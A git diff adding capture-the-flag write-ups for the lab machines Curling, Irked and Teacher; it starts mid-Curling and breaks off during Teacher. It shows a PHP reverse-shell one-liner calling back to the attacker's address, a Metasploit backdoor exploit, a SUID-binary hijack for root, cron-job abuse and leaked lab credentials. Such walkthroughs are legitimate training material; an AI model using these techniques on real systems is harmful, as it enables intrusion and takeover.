+ [15:55:28] 301 - 316B - /media/cms -> http://10.10.10.150/media/cms/
+ [15:55:28] 200 - 941B - /media/cms/
+ [15:55:28] 301 - 321B - /media/contacts -> http://10.10.10.150/media/contacts/
+ [15:55:32] 200 - 31B - /media/index.md
+ [15:55:34] 301 - 318B - /media/media -> http://10.10.10.150/media/media/
+ [15:55:39] 301 - 319B - /media/system -> http://10.10.10.150/media/system/
+ [15:55:39] 200 - 1KB - /media/system/
+ [15:55:41] Starting: modules/
+ [15:55:53] 200 - 31B - /modules/index.md
+ [15:56:03] Starting: plugins/
+ CTRL+C detected: Pausing threads, please wait...
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/ | grep Floris
+ <****p>- Floris <****/p>
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/ | grep secret
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/secret.txt
+ Q3VybGluZzIwMTgh
+
+
+Looking at the sourcecode of the index page of the box, we see that the username Floris comes up. At the bottom of the index sourcecode we see a commented line "secret.txt" Browsing to this /secret.txt file we get seem to get a strong password which could be base64-encoded : Q3VybGluZzIwMTgh
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → curl -sk http://10.10.10.150/secret.txt | base64 -d
+ Curling2018!
+
+
+Seems like we were right ! We now have credentials to work with. Our dirsearch command found the /administrator webpage earlier, Browsing onto it we find the joomla! login page, onto which we will try our freshly-acquired credentials : Floris:Curling2018!
+
+ 
+
+And we are logged in ! Now we navigate into Extensions > Templates > Options and set public and superuser permissions to allowed.
+
+
+
+Once that's done we will save the options and navigate to the Beez3 template details in order to edit it's index php file.
+
+
+
+Replace the entire php code with a reverse php shell one liner that will send back a reverse shell connection to our local machine (10.10.14.48) at the 9001 port.
+
+
+ <****?php
+ echo("nihilist WAS HERE");
+ exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/9001 0>&1'");
+
+
+We will use a terminal in order to recieve the incoming shell connection using the nc command with the -lvnp flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → nc -lvnp 9001
+
+
+We then click "preview template" which will run the infected index.php file and send us a reverse shell connection.
+
+
+
+As you can see, the echo() statement is being executed, which displays our string. Naturally, it also execute the reverse shell one liner.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Curling ]
+ → nc -lvnp 9001
+ Connection from 10.10.10.150:51798
+ bash: cannot set terminal process group (1319): Inappropriate ioctl for device
+ bash: no job control in this shell
+ www-data@curling:/var/www/html$ whoami
+ whoami
+ www-data
+ www-data@curling:/var/www/html$ uname -a
+ uname -a
+ Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+
+
+And we are logged in as www-data ! now let's see if we can print out the user flag.
+
+
+ www-data@curling:/var/www/html$ cd /home/floris
+ cd /home/floris
+ www-data@curling:/home/floris$ cat user.txt
+ cat user.txt
+ cat: user.txt: Permission denied
+
+
+It seems like we are not logged in with enough permissions. We will need to escalate privileges in order to gain the user access. Poking around the box from within our low-privileged shell, we find an interesting file named "password_backup"
+
+
+ www-data@curling:/home/floris$ ls
+ ls
+ admin-area
+ password_backup
+ user.txt
+ www-data@curling:/home/floris$ file password_backup
+ file password_backup
+ password_backup: ASCII text
+ www-data@curling:/home/floris$ cat password_backup
+ cat password_backup
+ 00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..;
+ 00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
+ 00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
+ 00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
+ 00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
+ 00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
+ 00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
+ 00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
+ 00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
+ 00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
+ 000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
+ 000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
+ 000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
+ 000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
+ 000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
+ 000000f0: 819b bb48 ...H
+
+
+We see that it is a hexdump file. We save it locally and decode it using the xxd command with the -r flag.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → nano password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → cat password_backup | xxd -r
+ BZh91AY&SY;���H���A��P)ava�:4N���nT#�@%�`
+ ��z�@�i�4hdi���9�h�Q�dh����4i�5n���Jh��*��}y.�<~�x�> �sVT�zH�ߢ�1�V��`F���"��n�
+ ۇ7j:X�dR��k�� ���)p�7۫;���9��PC�Y�P �HB��* ��G� �U@r�rE8P����H#
+
+
+That's weird, we seem to get a binary file once we decode the hexdump, we will save it as "BACKUP" and we'll run the file command to find out what it actually is.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → xxd -r password_backup > BACKUP
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: bzip2 compressed data, block size = 900k
+
+
+We seem to get a bzip2 file ! let's give it it's proper extension and then try to decompress it with the bzip2 command along with it's -d flag.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → bzip2 -d BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ BACKUP password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size modulo 2^32 141
+
+
+Now we seem to end up with a gzip file ! Let's give it it's proper extension and now try to decompress it with the gunzip command.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.gz
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → gunzip BACKUP.gz
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ BACKUP password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: bzip2 compressed data, block size = 900k
+
+
+Again a bzip2 file ! let's decompress it once again.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → bzip2 -d BACKUP.bz2
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ls
+ BACKUP password_backup
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → file BACKUP
+ BACKUP: POSIX tar archive (GNU)
+
+
+Now it's a tar archive... to decompress it we will use the tar command with the -xvf flags.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → mv BACKUP BACKUP.tar
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → tar -xvf BACKUP.tar
+ password.txt
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → cat password.txt
+ 5d<****wdCbdZu)|hChXll
+
+And there we go ! we have a password to work with now. We will use it to login as the user floris through a ssh connection.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Curling] → ssh floris@10.10.10.150
+ The authenticity of host '10.10.10.150 (10.10.10.150)' can't be established.
+ ECDSA key fingerprint is SHA256:o1Cqn+GlxiPRiKhany4ZMStLp3t9ePE9GjscsUsEjWM.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.150' (ECDSA) to the list of known hosts.
+ floris@10.10.10.150's password:
+ Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Fri Dec 6 10:26:56 UTC 2019
+
+ System load: 0.0 Processes: 169
+ Usage of /: 46.2% of 9.78GB Users logged in: 0
+ Memory usage: 21% IP address for ens33: 10.10.10.150
+ Swap usage: 0%
+
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon May 28 17:00:48 2018 from 192.168.1.71
+ floris@curling:~$ uname -a && whoami
+ Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+ floris
+ floris@curling:~$ cat /home/floris/user.txt
+ 65XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we are logged in ! We now have the necessary premissions to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Onto the machine there is a cronjob running every minute that is executing something inside the admin-area folder.
+
+
+ floris@curling:~$ ls -l
+ total 12
+ drwxr-x--- 2 root floris 4096 May 22 2018 admin-area
+ -rw-r--r-- 1 floris floris 1076 May 22 2018 password_backup
+ -rw-r----- 1 floris floris 33 May 22 2018 user.txt
+ floris@curling:~$ cd admin-area
+ floris@curling:~/admin-area$ ls -l
+ total 20
+ -rw-rw---- 1 root floris 25 Dec 6 10:34 input
+ -rw-rw---- 1 root floris 14236 Dec 6 10:34 report
+
+
+Within that folder we see that there are 2 files : input and report
+
+
+ floris@curling:~/admin-area$ cat input
+ url = "http://127.0.0.1"
+ floris@curling:~/admin-area$ cat output
+
+
+It seems like the input file is the command, and report is the output of the command. Let's not do something too complicated, we'll just change the URL to the root flag's location.
+
+
+ floris@curling:~/admin-area$ echo 'url = file:///root/root.txt' > input
+
+
+Wait exactly one minute and then print out the now-updated report file :
+
+
+ floris@curling:~/admin-area$ cat report
+ 82XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/25.md b/Easy/25.md
new file mode 100644
index 0000000..1b3cb96
--- /dev/null
+++ b/Easy/25.md
@@ -0,0 +1,335 @@
+# Irked Writeup
+
+
+
+## Introduction :
+
+Irked is an easy Linux box that was released back in November 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.117 --top-ports 65000 -Pn
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 16:11 CET
+ Nmap scan report for 10.10.10.117
+ Host is up (0.037s latency).
+ Not shown: 8315 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 111/tcp open rpcbind
+ 6697/tcp open ircs-u
+ 8067/tcp open infi-async
+
+ Nmap done: 1 IP address (1 host up) scanned in 57.80 seconds
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap 10.10.10.117 -sCV -p22,80,111,6697,8097
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 16:13 CET
+ Nmap scan report for 10.10.10.117
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
+ | ssh-hostkey:
+ | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
+ | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
+ | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
+ |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
+ 80/tcp open http Apache httpd 2.4.10 ((Debian))
+ |_http-server-header: Apache/2.4.10 (Debian)
+ |_http-title: Site doesn't have a title (text/html).
+ 111/tcp open rpcbind 2-4 (RPC #100000)
+ | rpcinfo:
+ | program version port/proto service
+ | 100000 2,3,4 111/tcp rpcbind
+ | 100000 2,3,4 111/udp rpcbind
+ | 100000 3,4 111/tcp6 rpcbind
+ | 100000 3,4 111/udp6 rpcbind
+ | 100024 1 42952/tcp status
+ | 100024 1 43551/udp6 status
+ | 100024 1 47932/udp status
+ |_ 100024 1 56558/tcp6 status
+ 6697/tcp open irc UnrealIRCd
+ 8097/tcp closed sac
+ Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 74.13 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan seems to have picked up UnrealIRCd on port 6697. Browsing to the 80th port which is running apache httpd 2.4.10, we are greeted with a simple image that gives us yet another hint speculating that we should work with the IRC part of this box.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → curl -sk http://10.10.10.117/
+ <****img src=irked.jpg> <****br> <****b> <****center>IRC is almost working! <****/b> <****/center>
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → searchsploit UnrealIRCd
+ ------------------------------------------------------------- -------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------------- -------------------------------
+ UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
+ UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
+ UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
+ UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
+ ------------------------------------------------------------- -------------------------------
+ Shellcodes: No Result
+
+We seeem to have a few exploits to work with. most notably the first one which is available for metasploit, let's fire up msfconsole and see if we can do anything there.
+
+
+ msf5 > search UnrealIRCd
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12 excellent No UnrealIRCD 3.2.8.1 Backdoor Command Execution
+
+
+ msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
+
+ Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 6667 yes The target port (TCP)
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic Target
+
+
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 10.10.10.117
+ RHOSTS => 10.10.10.117
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6697
+ RPORT => 6697
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
+
+
+We hit exploit and see if we get any result.
+
+
+ msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit
+
+ [*] Started reverse TCP double handler on 10.10.14.48:4444
+ [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
+ :irked.htb NOTICE AUTH :*** Looking up your hostname...
+ [*] 10.10.10.117:6697 - Sending backdoor command...
+ [*] Accepted the first client connection...
+ [*] Accepted the second client connection...
+ [*] Command: echo 2AGs6oeXBUrCqprk;
+ [*] Writing to socket A
+ [*] Writing to socket B
+ [*] Reading from sockets...
+ [*] Reading from socket A
+ [*] A: "2AGs6oeXBUrCqprk\r\n"
+ [*] Matching...
+ [*] B is input...
+ [*] Command shell session 1 opened (10.10.14.48:4444 -> 10.10.10.117:39782) at 2019-12-06 16:22:40 +0100
+
+ whoami
+ ircd
+
+ which python
+ /usr/bin/python
+
+
+and we are logged in as ircd ! Now, since python is available for us on the box, we will use a python one-liner using the pty module in order to spawn a nicer prompt. Once that's done we'll try to see if we can find the user flag.
+
+
+ python -c 'import pty; pty.spawn("/bin/bash")'
+ ircd@irked:~/Unreal3.2$ uname -a
+ uname -a
+ Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux
+
+ ircd@irked:/home/djmardov/Documents$ cat /home/djmardov/Documents/user.txt
+ cat /home/djmardov/Documents/user.txt
+ cat: /home/djmardov/Documents/user.txt: Permission denied
+
+
+We are logged in as ircd, however we do not have enough permissions to print out the user flag located in /home/djmardov/Documents/ . Poking around within the same folder, we seem to find a hidden .backup file.
+
+
+ ircd@irked:/home/djmardov/Documents$ ls -la
+ ls -la
+ total 16
+ drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
+ drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 2018 ..
+ -rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
+ -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
+
+ ircd@irked:/home/djmardov/Documents$ cat user.txt
+ cat user.txt
+ cat: user.txt: Permission denied
+
+ ircd@irked:/home/djmardov/Documents$ cat .backup
+ cat .backup
+ Super elite steg backup pw
+ UPupDOWNdownLRlrBAbaSSss
+
+
+
+The .backup file seems to hint us towards steganography, using the "UPupDOWNdownLRlrBAbaSSss" password. Steganography is the art of hiding information within images, we will use the steghide command onto the irked.jpg image we found earlier on the webpage to see if we can extract any data out of it using the password.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Irked ]
+ → wget http://10.10.10.117/irked.jpg
+ --2019-12-06 16:34:43-- http://10.10.10.117/irked.jpg
+ Connecting to 10.10.10.117:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 34697 (34K) [image/jpeg]
+ Saving to: ‘irked.jpg’
+
+ irked.jpg 100%[==============================================>] 33.88K --.-KB/s in 0.04s
+
+ 2019-12-06 16:34:43 (811 KB/s) - ‘irked.jpg’ saved [34697/34697]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Irked ]
+ → steghide extract -sf irked.jpg
+ Enter passphrase:
+ wrote extracted data to "pass.txt".
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Irked ]
+ → cat pass.txt
+ Kab6h+m+bbp2J:HG
+
+
+
+We seem to have a password to work with ! let's try to escalate privileges to the user djmardov using the su command.
+
+
+ ircd@irked:/home/djmardov/Documents$ su djmardov
+ su djmardov
+ Password: Kab6h+m+bbp2J:HG
+
+ djmardov@irked:~/Documents$ whoami
+ whoami
+ djmardov
+ djmardov@irked:~/Documents$ cat user.txt
+ cat user.txt
+ 4aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+It worked ! We have been able to print the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to elevate our privileges even further we need to poke around the box a little more. Let's list the binaries onto the box to see what we can work with.
+
+
+ djmardov@irked:~/Documents$ find / -perm -u=s -type f 2>/dev/null
+ find / -perm -u=s -type f 2>/dev/null
+ /usr/lib/dbus-1.0/dbus-daemon-launch-helper
+ /usr/lib/eject/dmcrypt-get-device
+ /usr/lib/policykit-1/polkit-agent-helper-1
+ /usr/lib/openssh/ssh-keysign
+ /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
+ /usr/sbin/exim4
+ /usr/sbin/pppd
+ /usr/bin/chsh
+ /usr/bin/procmail
+ /usr/bin/gpasswd
+ /usr/bin/newgrp
+ /usr/bin/at
+ /usr/bin/pkexec
+ /usr/bin/X
+ /usr/bin/passwd
+ /usr/bin/chfn
+ **/usr/bin/viewuser**
+ /sbin/mount.nfs
+ /bin/su
+ /bin/mount
+ /bin/fusermount
+ /bin/ntfs-3g
+ /bin/umount
+
+
+
+the viewuser binary doesn't sound all that common, let's inspect it a little further.
+
+
+ djmardov@irked:/usr/bin$ /usr/bin/viewuser
+ /usr/bin/viewuser
+ This application is being devleoped to set and test user permissions
+ It is still being actively developed
+ (unknown) :0 2019-12-06 05:47 (:0)
+ sh: 1: /tmp/listusers: not found
+
+
+The viewuser seems to be trying to execute a non-existant file/script within /tmp called listuser.
+
+
+ djmardov@irked:~$ cd /tmp && ls
+ cd /tmp && ls
+ systemd-private-b7b0ea6c069c44919947973463e3ecd1-colord.service-9t1iyd
+ systemd-private-b7b0ea6c069c44919947973463e3ecd1-cups.service-j2QDlp
+ systemd-private-b7b0ea6c069c44919947973463e3ecd1-rtkit-daemon.service-ZjjCnq
+ vmware-root
+
+
+As we can see, /tmp doesn't contain any file named listuser. Let's try to create a bashscript named "listuser" that could spawn yet another shell, which could have elevated privileges.
+
+
+ djmardov@irked:/tmp$ touch listusers
+ touch listusers
+
+ djmardov@irked:/tmp$ echo '#!/bin/bash' >> listusers
+ echo '#!/bin/bash' >> listusers
+
+ djmardov@irked:/tmp$ echo '/bin/sh' >> listusers
+ echo '/bin/sh' >> listusers
+
+ djmardov@irked:/tmp$ /usr/bin/viewuser
+ /usr/bin/viewuser
+ This application is being devleoped to set and test user permissions
+ It is still being actively developed
+ (unknown) :0 2019-12-06 05:47 (:0)
+ sh: 1: /tmp/listusers: Permission denied
+
+
+Now the binary file finds the listusers script , although we need to make it executable ! we will be using the chmod command along with the +x flag.
+
+
+ djmardov@irked:/tmp$ chmod +x listusers
+ chmod +x listusers
+
+ djmardov@irked:/tmp$ /usr/bin/viewuser
+ /usr/bin/viewuser
+
+ This application is being devleoped to set and test user permissions
+ It is still being actively developed
+ (unknown) :0 2019-12-06 05:47 (:0)
+
+ # whoami
+ whoami
+ root
+
+ # cat /root/root.txt
+ cat /root/root.txt
+ 8dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+It worked ! The binary executed our infected listusers script, and it spawned us a root shell, which gave us the root access.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/26.md b/Easy/26.md
new file mode 100644
index 0000000..f7e484d
--- /dev/null
+++ b/Easy/26.md
@@ -0,0 +1,540 @@
+# Teacher Writeup
+
+
+
+## Introduction :
+
+Teacher is an easy Linux box that was released back in December 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → nmap -F 10.10.10.153
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 17:19 CET
+ Nmap scan report for 10.10.10.153
+ Host is up (0.090s latency).
+ Not shown: 99 closed ports
+ PORT STATE SERVICE
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → nmap -sCV -p80 10.10.10.153
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 17:20 CET
+ Nmap scan report for 10.10.10.153
+ Host is up (0.071s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.4.25 ((Debian))
+ |_http-server-header: Apache/2.4.25 (Debian)
+ |_http-title: Blackhat highschool
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Browsing to the http://10.10.10.153/ page, we are greeted with the webservice our nmap scan picked up. Let's run a dirbuster scan in order to enumerate which folders are available onto this webservice.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → dirsearch -u http://10.10.10.153/ -e php -x 403 -r
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 6027
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-06_17-40-41.log
+
+ Target: http://10.10.10.153/
+
+
+
+While the dirsearch scan runs in the background, we will be Navigating to the gallery.html page we see something odd :
+
+
+
+
+ ****λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → curl -sk http://10.10.10.153/gallery.html | grep png <****li> <****a href="#"> <****img src="images/5.png" onerror="console.log('That\'s an F');" alt=""> <****/a> <****/li> <****li> <****a href="#"> <****img src="images/5_2.png" alt=""> <****/a> <****/li> <****li> <****a href="#"> <****img src="images/5_3.png" alt=""> <****/a> <****/li>
+ [...]
+
+Interesting ! there seems to be a problem with the image 5.png. let's download it and see what's up with it.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → wget http://10.10.10.153/images/5.png
+ --2019-12-06 17:31:30-- http://10.10.10.153/images/5.png
+ Connecting to 10.10.10.153:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 200 [image/png]
+ Saving to: ‘5.png’
+
+ 5.png 100%[============================================>] 200 --.-KB/s in 0s
+
+ 2019-12-06 17:31:31 (8.23 MB/s) - ‘5.png’ saved [200/200]
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → file 5.png
+ 5.png: ASCII text
+
+
+That's why the image wasn't working ! it was actually an ASCII text file. Let's print out it's contents using the cat command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → cat 5.png
+ Hi Servicedesk,
+
+ I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
+
+ Could you guys figure out what the last charachter is, or just reset it?
+
+ Thanks,
+ Giovanni
+
+
+
+We seem to have a password to work with: **Th4C00lTheacha** although it seems to be missing the last character according to the message. Creating a wordlist with all the possible passwords with python and then giving it to hydra we get the password **Th4C00lTheacha#**
+
+During this time , our dirsearch scan came back with a few results :
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → dirsearch -u http://10.10.10.153/ -e php -x 403-r
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 6027
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-06_17-40-41.log
+
+ Target: http://10.10.10.153/
+
+ [17:40:41] Starting:
+
+ [17:41:05] 301 - 310B - /css -> http://10.10.10.153/css/
+ [17:41:10] 301 - 312B - /fonts -> http://10.10.10.153/fonts/
+ [17:41:13] 301 - 313B - /images -> http://10.10.10.153/images/
+ [17:41:13] 200 - 8KB - /index.md
+ [17:41:14] 301 - 317B - /javascript -> http://10.10.10.153/javascript/
+ [17:41:15] 301 - 309B - /js -> http://10.10.10.153/js/
+ [17:41:18] 301 - 313B - /manual -> http://10.10.10.153/manual/
+ [17:41:18] 200 - 626B - /manual/index.md
+ [17:41:19] 301 - 313B - /moodle -> http://10.10.10.153/moodle/
+
+
+ Task Completed
+
+
+
+Dirsearch came back with an interesting result : /moodle
+
+Navigating onto the moodle login page, we are greeted with a login form onto which we'll try our credentials for the user giovanni.
+
+ 
+
+And we are logged in ! now let's see if we can find an exploit for the moodle webservice using the searchsploit command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Teacher ]
+ → searchsploit moodle
+ ------------------------------ ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------ ----------------------------------------
+ Mambo Component Mam-Moodle al | exploits/php/webapps/2064.txt
+ Moodle - Remote Command Execu | exploits/linux/remote/29324.rb
+ Moodle 1.1/1.2 - Cross-Site S | exploits/php/webapps/24071.txt
+ Moodle 1.5.2 - 'moodledata' R | exploits/php/webapps/3508.txt
+ Moodle 1.5/1.6 - '/mod/forum/ | exploits/php/webapps/29284.txt
+ Moodle 1.6dev - SQL Injection | exploits/php/webapps/1312.php
+ Moodle 1.7.1 - 'index.php' Cr | exploits/php/webapps/30261.txt
+ Moodle 1.8.3 - 'install.php' | exploits/php/webapps/31020.txt
+ Moodle 1.8.4 - Remote Code Ex | exploits/php/webapps/6356.php
+ Moodle 1.9.3 - Remote Code Ex | exploits/php/webapps/7437.txt
+ Moodle 1.x - 'post.php' Cross | exploits/php/webapps/24356.txt
+ Moodle 2.0.1 - 'PHPCOVERAGE_H | exploits/php/webapps/35297.txt
+ Moodle 2.3.8/2.4.5 - Multiple | exploits/php/webapps/28174.txt
+ Moodle 2.5.9/2.6.8/2.7.5/2.8. | exploits/php/webapps/36418.txt
+ Moodle 2.7 - Persistent Cross | exploits/php/webapps/34169.txt
+ Moodle 2.x/3.x - SQL Injectio | exploits/php/webapps/41828.php
+ **Moodle 3.4.1 - Remote Code Ex | exploits/php/webapps/46551.php**
+ Moodle 3.6.3 - 'Install Plugi | exploits/php/remote/46775.rb
